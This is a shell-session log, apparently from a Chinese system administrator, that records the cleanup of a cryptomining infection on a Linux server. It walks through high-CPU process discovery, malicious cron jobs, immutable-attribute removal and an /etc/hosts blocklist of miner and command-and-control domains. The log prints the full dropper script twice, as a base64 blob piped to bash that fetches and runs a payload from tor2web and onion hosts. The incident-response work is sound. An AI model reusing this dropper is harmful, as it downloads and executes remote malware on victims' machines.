记录一次挖矿病毒删除过程

[root@DIST /]# top

top - 21:24:35 up 59 days,  3:13,  2 users,  load average: 7.39, 7.40, 7.34
Tasks: 200 total,   2 running, 198 sleeping,   0 stopped,   0 zombie
%Cpu(s): 99.5 us,  0.3 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.2 si,  0.0 st
KiB Mem : 16268024 total,  1557392 free,  7288868 used,  7421764 buff/cache
KiB Swap:  1679356 total,  1672956 free,     6400 used.  7746200 avail Mem 

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND                                  
 8092 root      20   0 2444864   3380      4 S 597.0  0.0   2206:14 MWV7Gk                                   
27473 root      20   0 8997140 891104  11104 S   2.7  5.5 361:48.38 java                                     
  794 root      20   0  317100  19592   4336 S   0.3  0.1  34:31.64 vmtoolsd                                 
12492 root      20   0  137060   7820   1248 S   0.3  0.0  42:24.92 redis-server                             
    1 root      20   0  190924   3304   2200 S   0.0  0.0  10:52.63 systemd                                  
    2 root      20   0       0      0      0 S   0.0  0.0   0:00.38 kthreadd                                 
    3 root      20   0       0      0      0 S   0.0  0.0   1:46.13 ksoftirqd/0                              
    5 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/0:0H                             
    7 root      rt   0       0      0      0 S   0.0  0.0   0:05.55 migration/0                              
    8 root      20   0       0      0      0 S   0.0  0.0   0:00.00 rcu_bh                                   
    9 root      20   0       0      0      0 R   0.0  0.0  41:17.35 rcu_sched                                
   10 root      rt   0       0      0      0 S   0.0  0.0   0:47.52 watchdog/0                               
   11 root      rt   0       0      0      0 S   0.0  0.0   0:59.00 watchdog/1                               
   12 root      rt   0       0      0      0 S   0.0  0.0   0:12.19 migration/1                              
   13 root      20   0       0      0      0 S   0.0  0.0  24:09.37 ksoftirqd/1                              
   15 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/1:0H                             
   16 root      rt   0       0      0      0 S   0.0  0.0   1:08.07 watchdog/2                               
Fields Management for window 1:Def, whose current sort field is %CPU
   Navigate with Up/Dn, Right selects for move then  or Left commits,
   'd' or  toggles display, 's' sets sort.  Use 'q' or  to end!

* PID     = Process Id             PGRP    = Process Group Id       vMj     = Major Faults delta  
* USER    = Effective User Name    TTY     = Controlling Tty        vMn     = Minor Faults delta  
* PR      = Priority               TPGID   = Tty Process Grp Id     USED    = Res+Swap Size (KiB) 
* NI      = Nice Value             SID     = Session Id             nsIPC   = IPC namespace Inode 
* VIRT    = Virtual Image (KiB)    nTH     = Number of Threads      nsMNT   = MNT namespace Inode 
* RES     = Resident Size (KiB)    P       = Last Used Cpu (SMP)    nsNET   = NET namespace Inode 
* SHR     = Shared Memory (KiB)    TIME    = CPU Time               nsPID   = PID namespace Inode 
* S       = Process Status         SWAP    = Swapped Size (KiB)     nsUSER  = USER namespace Inode
* %CPU    = CPU Usage              CODE    = Code Size (KiB)        nsUTS   = UTS namespace Inode 
* %MEM    = Memory Usage (RES)     DATA    = Data+Stack (KiB)    
* TIME+   = CPU Time, hundredths   nMaj    = Major Page Faults   
* COMMAND = Command Name/Line      nMin    = Minor Page Faults   
  PPID    = Parent Process pid     nDRT    = Dirty Pages Count   
  UID     = Effective User Id      WCHAN   = Sleeping in Function
  RUID    = Real User Id           Flags   = Task Flags 
  RUSER   = Real User Name         CGROUPS = Control Groups      
  SUID    = Saved User Id          SUPGIDS = Supp Groups IDs     
  SUSER   = Saved User Name        SUPGRPS = Supp Groups Names   
  GID     = Group Id               TGID    = Thread Group Id     
  GROUP   = Group Name             ENVIRON = Environment vars    
  
[root@DIST /]# crontab -l
33 * * * * /root/.bffbe > /dev/null 2>&1 &
[root@DIST /]# tail /etc/crontab

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed

[root@DIST /]# cd /root/
[root@DIST ~]# ls
1.sh                                      openssh-7.9p1
2.sh                                      openssl-1.0.2k-12.el7.x86_64.rpm
3.sh                                      openssl-1.0.2k-16.el7_6.1.x86_64.rpm
a.gz                                      openssl-1.0.2q

[root@DIST ~]# cat .bffbe
#!/bin/bash
exec &>/dev/null
echo bffbe
echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0zMDAiKQp0PSQoZWNobyAidHJ1bXB6YmZmYmV3eTNnbiIpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoKCRjIGh0dHBzOi8vZG5zLnJ1YnlmaXNoLmNuLyRwIHx8CiAgICAgJGMgaHR0cHM6Ly9kbnMudHduaWMudHcvJHAgfHwKICAgICAkYyBodHRwczovL2RvaC5kbnMuc2IvJHAgfHwKICAgICAkYyBodHRwczovL2kuMjMzcHkuY29tLyRwKVwKICAgICB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MSwzfVxiIiB8dHIgJyAnICdcbid8c2VkICckIGQnfHNvcnQgLVJ8aGVhZCAtMSApCgp1KCkgewpmPS9pbnQuJCh1bmFtZSAtbSkKeD0uLyQoZGF0ZXxtZDVzdW18Y3V0IC1mMSAtZC0pCmZvciBpIGluICRkIC90bXAgL3Zhci90bXAgL2Rldi9zaG0gL3Vzci9iaW4gO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCB8fCAkYyAkMSRmIC1vJHgKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLmlvIHRvcjJ3ZWIuc3UKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLTEgL3RtcC8uWDExLXVuaXgvMDApL2lvOyB0aGVuCnUgJHQuJGgKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash
[root@DIST ~]# 

[root@DIST ~]# crontab -r
[root@DIST ~]# crontab -l
no crontab for root

[root@DIST etc]# cd /root
[root@DIST ~]# rm -rf .bffbe
rm: cannot remove ‘.bffbe’: Operation not permitted
[root@DIST ~]# lsattr -a
---------------- ./.
---------------- ./..
---------------- ./.bash_logout
---------------- ./.bashrc
---------------- ./.cshrc
---------------- ./.tcshrc
---------------- ./anaconda-ks.cfg
---------------- ./.bash_history
---------------- ./2.sh
---------------- ./3.sh
---------------- ./1.sh
---------------- ./zlib-1.2.11
----i----------- ./.bffbe
---------------- ./.bashtemp
----i----------- ./.systemd-login
[root@DIST ~]# chattr -i .bffbe
[root@DIST ~]# rm -rf .bffbe 

[root@DIST ~]# ls -lt /etc | head 
total 1240
drwxr-xr-x.  2 root root     85 Mar  2 14:50 cron.d
----------   1 root root      0 Mar  2 14:50 cfly
----------   1 root root      0 Mar  2 14:50 httpdz
----------   1 root root      0 Mar  2 14:50 migrations
-rw-r--r--   1 root root   1296 Mar  2 14:50 hosts
----------   1 root root    826 Mar  1 21:39 shadow
-rw-r--r--   1 root root     53 Feb 25 01:35 resolv.conf
-rw-r--r--   1 root root  37897 Feb 24 03:47 ld.so.cache
drwxr-xr-x.  2 root root     23 Feb  6 03:56 cron.daily

[root@DIST ~]# cd /etc
[root@DIST etc]# lsattr hosts
----i----------- hosts
[root@DIST etc]# chattr -i hosts
[root@DIST etc]# vi hosts
[root@DIST etc]# cat /etc/hosts
0.0.0.0		Rainbow66.f3322.net
0.0.0.0		rapid7cpfqnwxodo.tor2web.fyi
0.0.0.0		aptgetgxqs3secda.onion.ly
0.0.0.0		intelbagjop7nzm5.onion.glass
127.0.0.1		localhost
0.0.0.0		systemten.org
0.0.0.0		rapid7cpfqnwxodo.onion.ly
0.0.0.0		upir.ir

0.0.0.0		tor2web.io
0.0.0.0		intelbagjop7nzm5.onion.sh


0.0.0.0		pm.cpuminerpool.com
0.0.0.0		gitee.com

0.0.0.0		intelbagjop7nzm5.onion.mn
0.0.0.0		w.21-3n.xyz
0.0.0.0		aptgetgxqs3secda.onion.pet
0.0.0.0		lsd.systemten.org
0.0.0.0		timesync.su
0.0.0.0		aptgetgxqs3secda.onion.in.net
0.0.0.0		intelbagjop7nzm5.tor2web.io
0.0.0.0		intelbagjop7nzm5.onion.to
0.0.0.0		aptgetgxqs3secda.tor2web.fyi
0.0.0.0		an7kmd2wp4xo7hpr.onion.sh
0.0.0.0		an7kmd2wp4xo7hpr.d2web.org

0.0.0.0		rapid7cpfqnwxodo.onion.pet
0.0.0.0		an7kmd2wp4xo7hpr.tor2web.su

0.0.0.0		lsdu.b-cdn.net

0.0.0.0		an7kmd2wp4xo7hpr.timesync.su
0.0.0.0		img.sobot.com
0.0.0.0		rainbow20.eatuo.com
0.0.0.0		w.3ei.xyz
0.0.0.0		rapid7cpfqnwxodo.onion.in.net
0.0.0.0		aliyun.one

0.0.0.0		intelbagjop7nzm5.d2web.org
0.0.0.0		thyrsi.com
0.0.0.0		pastebin.com

0.0.0.0		intelbagjop7nzm5.onion.in.net

[root@DIST /]# ll
total 28
drwxr-xr-x    3 root root   25 Jul 23  2019 backup
lrwxrwxrwx.   1 root root    7 Dec 18  2018 bin -> usr/bin
dr-xr-xr-x.   4 root root 4096 Jun 24  2019 boot
drwxr-xr-x    3 root root   18 Jun  3  2019 data
drwxr-xr-x   20 root root 3220 Jan  3 17:58 dev
drwxr-xr-x.  87 root root 8192 Mar  2 22:12 etc
drwxr-xr-x.   2 root root    6 Nov  5  2016 home
lrwxrwxrwx.   1 root root    7 Dec 18  2018 lib -> usr/lib
drwxr-xr-x    2 root root   59 Mar  2 14:50 lib32
lrwxrwxrwx.   1 root root    9 Dec 18  2018 lib64 -> usr/lib64
drwxr-xr-x.   2 root root    6 Nov  5  2016 media
drwxr-xr-x.   2 root root    6 Nov  5  2016 mnt
drwxr-xr-x.   6 root root  124 Mar  2 00:13 opt
dr-xr-xr-x  210 root root    0 Jan  3 17:58 proc
dr-xr-x---.  22 root root 4096 Mar  2 22:14 root
drwxr-xr-x   25 root root  740 Feb 25 01:35 run
lrwxrwxrwx.   1 root root    8 Dec 18  2018 sbin -> usr/sbin
drwxr-xr-x.   2 root root    6 Nov  5  2016 srv
dr-xr-xr-x   13 root root    0 Jan  3 17:58 sys
d---------.  13 root root 4096 Mar  1 00:02 tmp
drwxr-xr-x    3 root root   23 Nov 11 15:32 Users
drwxr-xr-x.  14 root root  167 Jun  4  2019 usr
drwxr-xr-x.  19 root root  267 Jun 24  2019 var
-rw-r--r--    1 root root    4 Oct 21 16:34 zookeeper_server.pid
[root@DIST /]# chmod 755 tmp

[root@DIST tmp]# cd /etc
[root@DIST etc]# cd cron.d
[root@DIST cron.d]# ls
0bffbe  0hourly  0qcloud-stargate-admin-start  tomcat
[root@DIST cron.d]# ll
total 12
-rw-r--r--  1 root root  46 Nov 20  2015 0bffbe
-rw-r--r--. 1 root root 128 Mar 31  2016 0hourly
-rw-r--r--  1 root root  71 Nov 20  2015 0qcloud-stargate-admin-start
----------  1 root root   0 Mar  2 14:50 tomcat

[root@DIST cron.d]# cat 0bffbe 
53 * * * * root /opt/bffbe > /dev/null 2>&1 &
[root@DIST cron.d]# cd /opt
[root@DIST opt]# ls
bffbe  nginx-0.12  nu  perfstats-to-syslog  qcloud-stargate-admin-start.sh  yilu

[root@DIST opt]# cat bffbe
#!/bin/bash
exec &>/dev/null
echo bffbe
echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0zMDAiKQp0PSQoZWNobyAidHJ1bXB6YmZmYmV3eTNnbiIpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoKCRjIGh0dHBzOi8vZG5zLnJ1YnlmaXNoLmNuLyRwIHx8CiAgICAgJGMgaHR0cHM6Ly9kbnMudHduaWMudHcvJHAgfHwKICAgICAkYyBodHRwczovL2RvaC5kbnMuc2IvJHAgfHwKICAgICAkYyBodHRwczovL2kuMjMzcHkuY29tLyRwKVwKICAgICB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MSwzfVxiIiB8dHIgJyAnICdcbid8c2VkICckIGQnfHNvcnQgLVJ8aGVhZCAtMSApCgp1KCkgewpmPS9pbnQuJCh1bmFtZSAtbSkKeD0uLyQoZGF0ZXxtZDVzdW18Y3V0IC1mMSAtZC0pCmZvciBpIGluICRkIC90bXAgL3Zhci90bXAgL2Rldi9zaG0gL3Vzci9iaW4gO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCB8fCAkYyAkMSRmIC1vJHgKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLmlvIHRvcjJ3ZWIuc3UKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLTEgL3RtcC8uWDExLXVuaXgvMDApL2lvOyB0aGVuCnUgJHQuJGgKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash
[root@DIST opt]# lsattr
---------------- ./perfstats-to-syslog
---------------- ./qcloud-stargate-admin-start.sh
----i----------- ./bffbe
---------------- ./nu
---------------- ./yilu
---------------- ./nginx-0.12

[root@DIST opt]# rm -rf bffbe
rm: cannot remove ‘bffbe’: Operation not permitted
[root@DIST opt]# chattr -i bffbe 
[root@DIST opt]# ls
bffbe  nginx-0.12  nu  perfstats-to-syslog  qcloud-stargate-admin-start.sh  yilu
[root@DIST opt]# rm -rf bffbe
[root@DIST opt]# ls
nginx-0.12  nu  perfstats-to-syslog  qcloud-stargate-admin-start.sh  yilu

[root@DIST opt]# cd /etc
[root@DIST etc]# cd /cron.d
-bash: cd: /cron.d: No such file or directory
[root@DIST etc]# cd cron.d
[root@DIST cron.d]# ls
0bffbe  0hourly  0qcloud-stargate-admin-start  tomcat
[root@DIST cron.d]# lsattr 
---------------- ./0hourly
---------------- ./0qcloud-stargate-admin-start
---------------- ./0bffbe
---------------- ./tomcat
[root@DIST cron.d]# rm 0rf 0bffbe
rm: cannot remove ‘0rf’: No such file or directory
rm: remove regular file ‘0bffbe’? y